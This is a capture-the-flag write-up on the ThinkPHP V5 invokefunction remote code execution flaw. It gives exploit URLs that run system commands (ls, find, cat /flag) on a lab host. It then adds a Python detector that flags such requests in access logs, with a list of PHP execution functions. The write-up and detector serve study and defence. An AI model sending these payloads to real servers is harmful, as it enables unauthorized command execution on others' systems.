0x01 PHP_RCE
RCE: remote command/code execution.
This challenge is the ThinkPHP V5 remote code execution vulnerability.
0x02 Command execution
http://124.126.19.106:55365/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[command]
http://124.126.19.106:55365/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
http://124.126.19.106:55365/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag
http://124.126.19.106:55365/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
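
Seen from the defender's side, the requests above leave a distinctive trace in a web access log. The following detector is an added example, not part of the original writeup or of ThinkPHP; the log lines are constructed, the names classify and scan are hypothetical, and it assumes that legitimate module/controller/action routes in the s parameter never contain a backslash.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = r'''
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cat%20/flag HTTP/1.1" 200 64
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /?s=/index/index/hello&name=think HTTP/1.1" 200 128
203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /static/app.js HTTP/1.1" 200 2048
'''.strip().splitlines()

# Client IP and request target from one combined-log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (.+) HTTP/[\d.]+"')
# PHP functions that run OS commands or code; the page's requests use system.
EXEC_FUNCS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open", "assert"}


def classify(target):
    """Return the reasons a request target matches the invokefunction pattern."""
    reasons = []
    # parse_qsl percent-decodes keys and values, so %5Cthink%5Capp is caught too.
    for key, value in parse_qsl(target.partition("?")[2], keep_blank_values=True):
        low = value.lower()
        if key == "s" and "\\" in low:
            reasons.append("backslash in route parameter s (class name as controller)")
        if key == "s" and low.rstrip("/").endswith("invokefunction"):
            reasons.append("route ends in invokefunction")
        if key == "function" and low == "call_user_func_array":
            reasons.append("function=call_user_func_array")
        if key == "vars[0]" and low in EXEC_FUNCS:
            reasons.append("vars[0] names an execution function: " + low)
    return reasons


def scan(lines):
    """Return (client_ip, target, reasons) for every line with at least one hit."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        reasons = classify(m.group(2))
        if reasons:
            hits.append((m.group(1), m.group(2), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(reasons))
```

A hit on a production host is a reason to check the installed ThinkPHP version against the vendor's fixed releases and to review what the web server process did after that request.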